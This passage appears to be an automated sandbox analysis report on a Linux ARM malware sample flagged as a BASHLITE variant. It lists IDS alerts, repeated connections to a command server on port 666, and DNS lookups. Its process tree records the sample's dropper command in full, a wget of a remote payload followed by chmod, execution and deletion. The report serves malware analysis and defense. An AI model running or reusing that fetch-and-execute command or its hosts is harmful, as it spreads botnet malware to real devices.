                        2025-05-10T07:49:37.628760+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440814TCP
                        2025-05-10T07:49:53.188763+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440816TCP
                        2025-05-10T07:50:08.750909+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440818TCP
                        2025-05-10T07:50:24.312854+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440820TCP
                        2025-05-10T07:50:39.871661+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440822TCP
                        2025-05-10T07:50:55.432758+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440824TCP
                        2025-05-10T07:51:10.991025+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440826TCP
                        2025-05-10T07:51:26.552501+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440828TCP
                        2025-05-10T07:51:42.111035+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440830TCP
                        2025-05-10T07:51:57.666832+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440832TCP
                        2025-05-10T07:52:13.225744+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440834TCP
                        TimestampSource PortDest PortSource IPDest IP
                        May 10, 2025 07:48:50.115413904 CEST40808666192.168.2.1492.60.77.69
                        May 10, 2025 07:48:50.390012026 CEST6664080892.60.77.69192.168.2.14
                        May 10, 2025 07:48:50.390073061 CEST40808666192.168.2.1492.60.77.69
                        May 10, 2025 07:48:50.390397072 CEST40808666192.168.2.1492.60.77.69
                        May 10, 2025 07:48:50.662722111 CEST6664080892.60.77.69192.168.2.14
                        May 10, 2025 07:48:50.662761927 CEST6664080892.60.77.69192.168.2.14
                        May 10, 2025 07:48:50.662805080 CEST6664080892.60.77.69192.168.2.14
                        May 10, 2025 07:48:50.662899017 CEST40808666192.168.2.1492.60.77.69
                        May 10, 2025 07:48:50.935295105 CEST6664080892.60.77.69192.168.2.14
                        May 10, 2025 07:49:05.670747995 CEST40810666192.168.2.1492.60.77.69
                        May 10, 2025 07:49:05.943778038 CEST6664081092.60.77.69192.168.2.14
                        May 10, 2025 07:49:05.944353104 CEST40810666192.168.2.1492.60.77.69
                        May 10, 2025 07:49:05.946324110 CEST40810666192.168.2.1492.60.77.69
                        May 10, 2025 07:49:06.217458963 CEST6664081092.60.77.69192.168.2.14
                        May 10, 2025 07:49:06.217519045 CEST6664081092.60.77.69192.168.2.14
                        May 10, 2025 07:49:06.218086004 CEST40810666192.168.2.1492.60.77.69
                        May 10, 2025 07:49:06.218199015 CEST40810666192.168.2.1492.60.77.69
                        May 10, 2025 07:49:06.218842983 CEST6664081092.60.77.69192.168.2.14
                        May 10, 2025 07:49:06.490745068 CEST6664081092.60.77.69192.168.2.14
                        May 10, 2025 07:49:06.490799904 CEST6664081092.60.77.69192.168.2.14
                        May 10, 2025 07:49:21.229635954 CEST40812666192.168.2.1492.60.77.69
                        May 10, 2025 07:49:21.546516895 CEST6664081292.60.77.69192.168.2.14
                        May 10, 2025 07:49:21.546973944 CEST40812666192.168.2.1492.60.77.69
                        May 10, 2025 07:49:21.547045946 CEST40812666192.168.2.1492.60.77.69
                        May 10, 2025 07:49:21.973874092 CEST6664081292.60.77.69192.168.2.14
                        May 10, 2025 07:49:22.058608055 CEST6664081292.60.77.69192.168.2.14
                        May 10, 2025 07:49:22.058938980 CEST40812666192.168.2.1492.60.77.69
                        May 10, 2025 07:49:22.070445061 CEST6664081292.60.77.69192.168.2.14
                        May 10, 2025 07:49:22.332622051 CEST6664081292.60.77.69192.168.2.14
                        May 10, 2025 07:49:37.081484079 CEST40814666192.168.2.1492.60.77.69
                        May 10, 2025 07:49:37.354676962 CEST6664081492.60.77.69192.168.2.14
                        May 10, 2025 07:49:37.355335951 CEST40814666192.168.2.1492.60.77.69
                        May 10, 2025 07:49:37.355335951 CEST40814666192.168.2.1492.60.77.69
                        May 10, 2025 07:49:37.628715038 CEST6664081492.60.77.69192.168.2.14
                        May 10, 2025 07:49:37.628760099 CEST6664081492.60.77.69192.168.2.14
                        May 10, 2025 07:49:37.628782988 CEST6664081492.60.77.69192.168.2.14
                        May 10, 2025 07:49:37.629210949 CEST40814666192.168.2.1492.60.77.69
                        May 10, 2025 07:49:37.903469086 CEST6664081492.60.77.69192.168.2.14
                        May 10, 2025 07:49:52.642123938 CEST40816666192.168.2.1492.60.77.69
                        May 10, 2025 07:49:52.914794922 CEST6664081692.60.77.69192.168.2.14
                        May 10, 2025 07:49:52.915446997 CEST40816666192.168.2.1492.60.77.69
                        May 10, 2025 07:49:52.915447950 CEST40816666192.168.2.1492.60.77.69
                        May 10, 2025 07:49:53.188688040 CEST6664081692.60.77.69192.168.2.14
                        May 10, 2025 07:49:53.188762903 CEST6664081692.60.77.69192.168.2.14
                        May 10, 2025 07:49:53.188786030 CEST6664081692.60.77.69192.168.2.14
                        May 10, 2025 07:49:53.189469099 CEST40816666192.168.2.1492.60.77.69
                        May 10, 2025 07:49:53.463547945 CEST6664081692.60.77.69192.168.2.14
                        May 10, 2025 07:50:08.204898119 CEST40818666192.168.2.1492.60.77.69
                        May 10, 2025 07:50:08.477540016 CEST6664081892.60.77.69192.168.2.14
                        May 10, 2025 07:50:08.477925062 CEST40818666192.168.2.1492.60.77.69
                        May 10, 2025 07:50:08.478044033 CEST40818666192.168.2.1492.60.77.69
                        May 10, 2025 07:50:08.750845909 CEST6664081892.60.77.69192.168.2.14
                        May 10, 2025 07:50:08.750909090 CEST6664081892.60.77.69192.168.2.14
                        May 10, 2025 07:50:08.750943899 CEST6664081892.60.77.69192.168.2.14
                        May 10, 2025 07:50:08.751274109 CEST40818666192.168.2.1492.60.77.69
                        May 10, 2025 07:50:09.023956060 CEST6664081892.60.77.69192.168.2.14
                        May 10, 2025 07:50:23.766678095 CEST40820666192.168.2.1492.60.77.69
                        May 10, 2025 07:50:24.039484024 CEST6664082092.60.77.69192.168.2.14
                        May 10, 2025 07:50:24.039820910 CEST40820666192.168.2.1492.60.77.69
                        May 10, 2025 07:50:24.040172100 CEST40820666192.168.2.1492.60.77.69
                        May 10, 2025 07:50:24.312796116 CEST6664082092.60.77.69192.168.2.14
                        May 10, 2025 07:50:24.312854052 CEST6664082092.60.77.69192.168.2.14
                        May 10, 2025 07:50:24.312875032 CEST6664082092.60.77.69192.168.2.14
                        May 10, 2025 07:50:24.313267946 CEST40820666192.168.2.1492.60.77.69
                        May 10, 2025 07:50:24.586494923 CEST6664082092.60.77.69192.168.2.14
                        May 10, 2025 07:50:39.324376106 CEST40822666192.168.2.1492.60.77.69
                        May 10, 2025 07:50:39.597943068 CEST6664082292.60.77.69192.168.2.14
                        May 10, 2025 07:50:39.598376036 CEST40822666192.168.2.1492.60.77.69
                        May 10, 2025 07:50:39.598376036 CEST40822666192.168.2.1492.60.77.69
                        May 10, 2025 07:50:39.871606112 CEST6664082292.60.77.69192.168.2.14
                        May 10, 2025 07:50:39.871660948 CEST6664082292.60.77.69192.168.2.14
                        May 10, 2025 07:50:39.871697903 CEST6664082292.60.77.69192.168.2.14
                        May 10, 2025 07:50:39.872138977 CEST40822666192.168.2.1492.60.77.69
                        May 10, 2025 07:50:40.145875931 CEST6664082292.60.77.69192.168.2.14
                        May 10, 2025 07:50:54.885391951 CEST40824666192.168.2.1492.60.77.69
                        May 10, 2025 07:50:55.158253908 CEST6664082492.60.77.69192.168.2.14
                        May 10, 2025 07:50:55.158627987 CEST40824666192.168.2.1492.60.77.69
                        May 10, 2025 07:50:55.158627987 CEST40824666192.168.2.1492.60.77.69
                        May 10, 2025 07:50:55.432693005 CEST6664082492.60.77.69192.168.2.14
                        May 10, 2025 07:50:55.432758093 CEST6664082492.60.77.69192.168.2.14
                        May 10, 2025 07:50:55.432795048 CEST6664082492.60.77.69192.168.2.14
                        May 10, 2025 07:50:55.433212042 CEST40824666192.168.2.1492.60.77.69
                        May 10, 2025 07:50:55.706684113 CEST6664082492.60.77.69192.168.2.14
                        May 10, 2025 07:51:10.444714069 CEST40826666192.168.2.1492.60.77.69
                        May 10, 2025 07:51:10.717616081 CEST6664082692.60.77.69192.168.2.14
                        May 10, 2025 07:51:10.718262911 CEST40826666192.168.2.1492.60.77.69
                        May 10, 2025 07:51:10.718264103 CEST40826666192.168.2.1492.60.77.69
                        May 10, 2025 07:51:10.990947962 CEST6664082692.60.77.69192.168.2.14
                        May 10, 2025 07:51:10.991024971 CEST6664082692.60.77.69192.168.2.14
                        May 10, 2025 07:51:10.991064072 CEST6664082692.60.77.69192.168.2.14
                        May 10, 2025 07:51:10.991432905 CEST40826666192.168.2.1492.60.77.69
                        May 10, 2025 07:51:11.264062881 CEST6664082692.60.77.69192.168.2.14
                        May 10, 2025 07:51:26.002108097 CEST40828666192.168.2.1492.60.77.69
                        May 10, 2025 07:51:26.278362036 CEST6664082892.60.77.69192.168.2.14
                        May 10, 2025 07:51:26.278700113 CEST40828666192.168.2.1492.60.77.69
                        May 10, 2025 07:51:26.278801918 CEST40828666192.168.2.1492.60.77.69
                        May 10, 2025 07:51:26.552427053 CEST6664082892.60.77.69192.168.2.14
                        May 10, 2025 07:51:26.552500963 CEST6664082892.60.77.69192.168.2.14
                        May 10, 2025 07:51:26.552540064 CEST6664082892.60.77.69192.168.2.14
                        May 10, 2025 07:51:26.552809000 CEST40828666192.168.2.1492.60.77.69
                        May 10, 2025 07:51:26.826592922 CEST6664082892.60.77.69192.168.2.14
                        May 10, 2025 07:51:41.563075066 CEST40830666192.168.2.1492.60.77.69
                        May 10, 2025 07:51:41.836890936 CEST6664083092.60.77.69192.168.2.14
                        May 10, 2025 07:51:41.837260008 CEST40830666192.168.2.1492.60.77.69
                        May 10, 2025 07:51:41.837260962 CEST40830666192.168.2.1492.60.77.69
                        May 10, 2025 07:51:42.110819101 CEST6664083092.60.77.69192.168.2.14
                        May 10, 2025 07:51:42.111035109 CEST6664083092.60.77.69192.168.2.14
                        May 10, 2025 07:51:42.111074924 CEST6664083092.60.77.69192.168.2.14
                        May 10, 2025 07:51:42.111346960 CEST40830666192.168.2.1492.60.77.69
                        May 10, 2025 07:51:42.385340929 CEST6664083092.60.77.69192.168.2.14
                        May 10, 2025 07:51:57.119409084 CEST40832666192.168.2.1492.60.77.69
                        May 10, 2025 07:51:57.392865896 CEST6664083292.60.77.69192.168.2.14
                        May 10, 2025 07:51:57.393224955 CEST40832666192.168.2.1492.60.77.69
                        May 10, 2025 07:51:57.393225908 CEST40832666192.168.2.1492.60.77.69
                        May 10, 2025 07:51:57.666775942 CEST6664083292.60.77.69192.168.2.14
                        May 10, 2025 07:51:57.666831970 CEST6664083292.60.77.69192.168.2.14
                        May 10, 2025 07:51:57.666867018 CEST6664083292.60.77.69192.168.2.14
                        May 10, 2025 07:51:57.667201996 CEST40832666192.168.2.1492.60.77.69
                        May 10, 2025 07:51:57.940371037 CEST6664083292.60.77.69192.168.2.14
                        May 10, 2025 07:52:12.679265976 CEST40834666192.168.2.1492.60.77.69
                        May 10, 2025 07:52:12.952128887 CEST6664083492.60.77.69192.168.2.14
                        May 10, 2025 07:52:12.952429056 CEST40834666192.168.2.1492.60.77.69
                        May 10, 2025 07:52:12.952856064 CEST40834666192.168.2.1492.60.77.69
                        May 10, 2025 07:52:13.225678921 CEST6664083492.60.77.69192.168.2.14
                        May 10, 2025 07:52:13.225744009 CEST6664083492.60.77.69192.168.2.14
                        May 10, 2025 07:52:13.225781918 CEST6664083492.60.77.69192.168.2.14
                        May 10, 2025 07:52:13.226171017 CEST40834666192.168.2.1492.60.77.69
                        May 10, 2025 07:52:13.499530077 CEST6664083492.60.77.69192.168.2.14
                        TimestampSource PortDest PortSource IPDest IP
                        May 10, 2025 07:48:50.399332047 CEST4699953192.168.2.141.1.1.1
                        May 10, 2025 07:48:50.399394989 CEST4466253192.168.2.141.1.1.1
                        May 10, 2025 07:48:50.540594101 CEST53446621.1.1.1192.168.2.14
                        May 10, 2025 07:48:50.540769100 CEST4466253192.168.2.141.1.1.1
                        May 10, 2025 07:48:50.556044102 CEST53469991.1.1.1192.168.2.14
                        May 10, 2025 07:48:50.556112051 CEST4699953192.168.2.141.1.1.1
                        May 10, 2025 07:48:50.681988955 CEST53446621.1.1.1192.168.2.14
                        May 10, 2025 07:48:50.697469950 CEST53469991.1.1.1192.168.2.14
                        May 10, 2025 07:51:32.552582979 CEST3279753192.168.2.141.1.1.1
                        May 10, 2025 07:51:32.552583933 CEST3405153192.168.2.141.1.1.1
                        May 10, 2025 07:51:32.693795919 CEST53340511.1.1.1192.168.2.14
                        May 10, 2025 07:51:32.693818092 CEST53327971.1.1.1192.168.2.14
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        May 10, 2025 07:48:50.399332047 CEST192.168.2.141.1.1.10x35c4Standard query (0)gay.energyA (IP address)IN (0x0001)false
                        May 10, 2025 07:48:50.399394989 CEST192.168.2.141.1.1.10xc79bStandard query (0)gay.energy28IN (0x0001)false
                        May 10, 2025 07:48:50.540769100 CEST192.168.2.141.1.1.10xc79bStandard query (0)gay.energy28IN (0x0001)false
                        May 10, 2025 07:48:50.556112051 CEST192.168.2.141.1.1.10x35c4Standard query (0)gay.energyA (IP address)IN (0x0001)false
                        May 10, 2025 07:51:32.552582979 CEST192.168.2.141.1.1.10x420cStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                        May 10, 2025 07:51:32.552583933 CEST192.168.2.141.1.1.10xd4e3Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        May 10, 2025 07:48:50.540594101 CEST1.1.1.1192.168.2.140xc79bName error (3)gay.energynonenone28IN (0x0001)false
                        May 10, 2025 07:48:50.556044102 CEST1.1.1.1192.168.2.140x35c4Name error (3)gay.energynonenoneA (IP address)IN (0x0001)false
                        May 10, 2025 07:48:50.681988955 CEST1.1.1.1192.168.2.140xc79bName error (3)gay.energynonenone28IN (0x0001)false
                        May 10, 2025 07:48:50.697469950 CEST1.1.1.1192.168.2.140x35c4Name error (3)gay.energynonenoneA (IP address)IN (0x0001)false
                        May 10, 2025 07:51:32.693818092 CEST1.1.1.1192.168.2.140x420cNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                        May 10, 2025 07:51:32.693818092 CEST1.1.1.1192.168.2.140x420cNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

                        System Behavior

                        Start time (UTC):05:48:49
                        Start date (UTC):10/05/2025
                        Path:/tmp/armv4l.elf
                        Arguments:/tmp/armv4l.elf
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):05:48:49
                        Start date (UTC):10/05/2025
                        Path:/tmp/armv4l.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):05:48:49
                        Start date (UTC):10/05/2025
                        Path:/bin/sh
                        Arguments:/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):05:48:49
                        Start date (UTC):10/05/2025
                        Path:/bin/sh
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):05:48:49
                        Start date (UTC):10/05/2025
                        Path:/usr/bin/wget
                        Arguments:wget -q http://gay.energy/.../vivid -O .....
                        File size:548568 bytes
                        MD5 hash:996940118df7bb2aaa718589d4e95c08

                        Start time (UTC):05:48:50
                        Start date (UTC):10/05/2025
                        Path:/bin/sh
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):05:48:50
                        Start date (UTC):10/05/2025
                        Path:/usr/bin/chmod
                        Arguments:chmod 777 .....
                        File size:63864 bytes
                        MD5 hash:739483b900c045ae1374d6f53a86a279

                        Start time (UTC):05:48:50
                        Start date (UTC):10/05/2025
                        Path:/bin/sh
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):05:48:50
                        Start date (UTC):10/05/2025
                        Path:/bin/sh
                        Arguments:/bin/sh ./.....
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):05:48:50
                        Start date (UTC):10/05/2025
                        Path:/bin/sh
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):05:48:50
                        Start date (UTC):10/05/2025
                        Path:/usr/bin/rm
                        Arguments:rm -rf .....
                        File size:72056 bytes
                        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                        Start time (UTC):05:48:49
                        Start date (UTC):10/05/2025
                        Path:/tmp/armv4l.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):05:48:49
                        Start date (UTC):10/05/2025
                        Path:/tmp/armv4l.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):05:48:49
                        Start date (UTC):10/05/2025
                        Path:/tmp/armv4l.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1